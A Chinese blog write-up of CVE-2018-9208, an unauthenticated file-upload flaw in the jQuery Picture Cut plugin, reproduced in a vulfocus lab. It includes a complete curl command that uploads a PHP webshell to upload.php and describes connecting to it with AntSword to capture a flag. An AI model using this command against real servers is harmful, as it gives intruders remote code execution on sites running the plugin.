当前位置: 首页 > news >正文

漏洞复现-jquery-picture-cut 任意文件上传_(CVE-2018-9208)

jquery-picture-cut 任意文件上传_(CVE-2018-9208)

漏洞信息

  • jQuery Picture Cut v1.1以下版本中存在安全漏洞
  • CVE-2018-9208
  • 文件上传漏洞

描述

​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

访问首页

image-20231027115056615

使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置

jquery-picture-cut/src/php/upload.php
curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@yijuhua.php" http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php

image-20231027115508665

使用中国蚁剑连接

http://10.9.47.6:56174/yijuhua.php

image-20231027115602804

获取flag

image-20231027115638391

http://www.lryc.cn/news/207975.html

相关文章:

  • Golang Websocket框架:实时通信的新选择
  • ExoPlayer架构详解与源码分析(7)——SampleQueue
  • 第二证券:基本面改善预期强化 机构聚焦科技成长
  • 大语言模型在天猫AI导购助理项目的实践!
  • 【STM32】GPIO控制LED(HAL库版)
  • 第27届亚洲国际动力传动与控制技术展览会盛大开幕,意大利国家展团闪耀回归
  • 永恒之蓝漏洞 ms17_010 详解
  • 汽车托运全流程介绍
  • 【API篇】八、Flink窗口函数
  • React JSX常用语法总结
  • DVWA-Cross Site Request Forgery (CSRF)
  • 浅谈安科瑞可编程电测仪表在老挝某项目的应用
  • Java项目源码合集
  • Python学习笔记--生成器
  • 【Python学习】—Python基础语法(五)
  • 【js】JavaScript清除所有(多个)定时器的方法:
  • java实现周易64卦并返回对应的卦象(含百度百科链接)
  • # 算法与程序的灵魂
  • 2023-10-21 美团2024秋招后端开发岗笔试题
  • 汽车托运是怎样收费
  • 使用docker-compose私有化部署 GitLab
  • Vue项目引入百度统计的正确操作步骤,亲测有效!
  • Keras中model.evaluate() 返回的是 loss value 和 metrics values
  • CSRF跨域请求伪造
  • LeetCode 1465. 切割后面积最大的蛋糕:纵横分别处理
  • YTM32的增强型定时器eTMR外设模块详解
  • 40.查找练习题(王道2023数据结构第7章)
  • Segmentation fault 的bug解决
  • 【Python机器学习】零基础掌握BaggingRegressor集成学习
  • 麒麟KYLINOS通过命令行配置kysec的防火墙